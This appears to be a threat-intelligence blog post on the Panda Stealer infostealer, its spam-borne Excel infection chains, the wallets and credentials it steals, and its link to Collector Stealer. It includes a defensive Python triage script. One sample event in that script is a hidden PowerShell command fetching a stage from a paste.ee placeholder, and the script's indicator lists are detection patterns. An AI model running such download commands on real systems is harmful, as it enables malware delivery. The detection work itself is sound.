Do you know where your Bitcoins are Today?

A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam. Panda Stealer malware is distributed through spam emails and uses the same hard-to-detect fileless delivery method seen in a recent Phobos ransomware campaign discovered by investigators.

The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States. Panda Stealer was discovered by Trend Micro at the beginning of April 2021. Threat researchers have identified two infection chains being used by the campaign. Analysts said: "In one, an .XLSM attachment contains macros that download a loader, then the loader downloads and executes the main stealer.

"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command." Once installed, Panda Stealer can collect details such as private keys and records of past transactions from the victim's digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.
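The second chain above (an Excel document spawning PowerShell that pulls a stage from paste.ee) is the kind of parent/child relationship endpoint telemetry catches well. The following is an added example, not code from the original post or from Trend Micro: a small triage routine run over constructed Sysmon-style process-creation records; the field names, the sample paths and the PLACEHOLDER URL are assumptions, and Word is included as a parent only by assumption.

```python
import re

# Indicators drawn from the chain described above: an Excel document that
# launches PowerShell, which then fetches a second stage from paste.ee.
OFFICE_PARENTS = {"excel.exe", "winword.exe"}       # Word added as an assumption
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
PASTE_HOSTS = ("paste.ee",)                          # host named in the report
HIDDEN_RE = re.compile(r"-(w|windowstyle)\s+hidden", re.I)

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": 'powershell -w hidden -c "Invoke-WebRequest https://paste.ee/r/PLACEHOLDER"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -c Get-Process"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "cmd /c dir"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the list of indicator names an event matches (empty = nothing flagged)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    if parent in OFFICE_PARENTS and image in PS_IMAGES:
        hits.append("office-spawned-powershell")
    if any(host in cmd.lower() for host in PASTE_HOSTS):
        hits.append("paste-site-fetch")
    if HIDDEN_RE.search(cmd):
        hits.append("hidden-window")
    return hits

def triage(events):
    """Map event index -> (severity, hits); two or more indicators escalate to 'high'."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = ("high" if len(hits) >= 2 else "medium", hits)
    return result

if __name__ == "__main__":
    for idx, (sev, hits) in triage(SAMPLE_EVENTS).items():
        print(idx, sev, hits)
```

Only the first record is flagged; Office spawning cmd.exe on its own is left alone here, which is a tuning choice rather than a statement that it is benign.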

Panda has other capabilities, such as taking screenshots of the infected computer and exfiltrating browser data such as cookies, passwords, and card details. Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended.

Panda Stealer was determined to be a variant of Collector Stealer, cracked by the Russian threat actor NCP, also known as su1c1de. "Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers. CollectorStealer (also known as DCStealer) is malicious software that allows cyber criminals to steal various sensitive information (e.g. passwords, credit card details) and files. This malware is for sale on a hacker forum for $12 or $75 (depending on the subscription type). It is advertised on the aforementioned forum as a "top-end information stealer" with a Russian interface.

While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders. When analysts categorized the attacks detected across seven million enterprise endpoints over the last 12 months, they found that infostealers made up the highest percentage of attempted endpoint attacks (31%).

Red Sky Alliance has been analyzing and documenting cyber threats and groups for over 9 years and maintains a resource library of malware and cyber actor reports available at https://redskyalliance.org at no charge. Many past tactics are reused in current malicious campaigns.

To protect your own supply chain, consider subscribing to RedXray, Red Sky Alliance's cyber threat notification service. Details can be found at: https://www.wapacklabs.com/redxray.


Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com


Weekly Cyber Intelligence Briefings:


Reporting:   https://www.redskyalliance.org/
Website:  https://www.wapacklabs.com/
LinkedIn:    https://www.linkedin.com/company/64265941 


REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/3702558539639477516


TR-21-146-001_Bitcoin.pdf


https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt
